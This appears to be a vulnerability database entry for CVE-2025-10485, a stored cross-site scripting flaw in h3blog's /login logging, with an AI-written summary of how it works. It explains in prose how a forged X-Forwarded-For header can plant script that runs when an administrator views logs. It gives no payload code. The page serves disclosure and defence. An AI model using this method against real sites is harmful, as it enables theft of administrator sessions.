Medium severity4.3NVD Advisory· Published Sep 15, 2025· Updated Apr 29, 2026

CVE-2025-10485

Description

A vulnerability has been found in pojoin h3blog up to 5bf704425ebc11f4c24da51f32f36bb17ae20489. Affected by this issue is the function ppt_log of the file /login of the component HTTP Header Handler. Such manipulation of the argument X-Forwarded-For leads to cross site scripting. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

A stored XSS vulnerability in h3blog's /login endpoint allows an attacker to inject malicious JavaScript via the X-Forwarded-For header, which executes when an administrator views operation logs.

The vulnerability resides in the ppt_log function within the /login endpoint of h3blog. The application records user operation logs, including the IP address obtained from the X-Forwarded-For header via get_real_ip(), without proper sanitization. An attacker can craft a login request with a malicious script in the X-Forwarded-For header, which is then stored in the log and executed when an administrator views the logs [1].

To exploit this, an attacker sends a POST request to /login with a forged X-Forwarded-For header containing JavaScript payload. The attack requires no authentication and can be performed remotely, as the endpoint is publicly accessible. The injected script runs in the context of the administrator's browser session [1].

Successful exploitation leads to stored cross-site scripting (XSS), allowing the attacker to steal cookies, session tokens, or other sensitive information, or perform actions on behalf of the administrator. This could compromise the entire application's security [1].

As of the publication date, the vendor uses a rolling release system, and no specific version information for patches is disclosed. Users should monitor for updates and consider input validation on the X-Forwarded-For header as a workaround until a fix is available.

References

CVE/xss.md at main · hhhh333/CVE

AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

Pojoin/H3bloginferred2 versions
<=5bf704425ebc11f4c24da51f32f36bb17ae20489+ 1 more
- (no CPE)range: <=5bf704425ebc11f4c24da51f32f36bb17ae20489
- (no CPE)

Patches

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References

github.com/hhhh333/CVE/blob/main/xss.mdnvd
vuldb.comnvd
vuldb.comnvd
vuldb.comnvd

News mentions

No linked articles in our index yet.

cvss	0.280
epss	0.000
exploit	0.000
kev	0.000
patch	0.000
ransomware	0.000